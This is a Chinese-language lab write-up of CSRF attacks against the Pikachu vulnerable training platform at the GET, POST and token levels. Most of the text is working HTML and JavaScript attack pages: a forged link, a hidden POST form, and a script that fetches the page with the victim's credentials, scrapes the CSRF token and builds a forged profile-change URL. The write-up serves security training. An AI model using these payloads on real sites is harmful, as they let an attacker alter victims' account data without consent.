pikachu-csrf实例

get级别

这里需要同时修改性别、手机、住址、邮箱。

写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html><body><a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">pikachu-csrf-get</a></body>
</html>

点击"pikachu-csrf-get"文字后，跳转到pikachu的csrf(get)界面，展示修改后的界面。

post级别

这里post请求，需要通过表单提交。
写一个简单的html文件，里面伪装修改密码的文字，代码如下：

<html><body><a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">pikachu-csrf-get</a></br><form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="5" /><input id="phonenum" type="text" name="phonenum" value="5" /><input id="add" type="text" name="add" value="5" /><input id="email" type="text" name="email" value="5" /><input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" /></form></body></html>

点击"pikachu-csrf-post"文字后，跳转到pikachu的csrf(post)界面，展示修改后的界面。

token级别

这里get请求+token。
写一个简单的html文件，里面get请求拼接token，代码如下：

<html><body><a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">pikachu-csrf-get</a></br><form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="5" /><input id="phonenum" type="text" name="phonenum" value="5" /><input id="add" type="text" name="add" value="5" /><input id="email" type="text" name="email" value="5" /><input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" /></form></br><a  href="javascript:void(0);" onclick="initJS()">pikachu-csrf-token</a></body><script >function initJS(){var theUrl = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php';if(window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest();}else{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}var count = 0;xmlhttp.withCredentials = true;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState ==4 && xmlhttp.status==200){var text = xmlhttp.responseText;// 创建一个临时的 div 元素，并将 HTML 字符串设置为其 innerHTML  var tempDiv = document.createElement('div');  tempDiv.innerHTML = text;  // 从临时 div 中查找具有 name 属性为 "token" 的输入元素  var tokenInput = tempDiv.querySelector('input[name="token"]');  var token = tokenInput.value;  console.log('Token Value:', token); // 在控制台输出 token 的值 console.log('count',count);var new_url = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex=7&phonenum=7&add=7&email=7&token='+token+'&submit=submit';console.log('newurl',new_url);        }};xmlhttp.open("GET",theUrl,false);xmlhttp.send();}</script></html>

点击"pikachu-csrf-token"文字后，在控制台中查看newurl，并复制下来输入到浏览器中。


刷新csrf token，展示了修改后的信息。

破解成功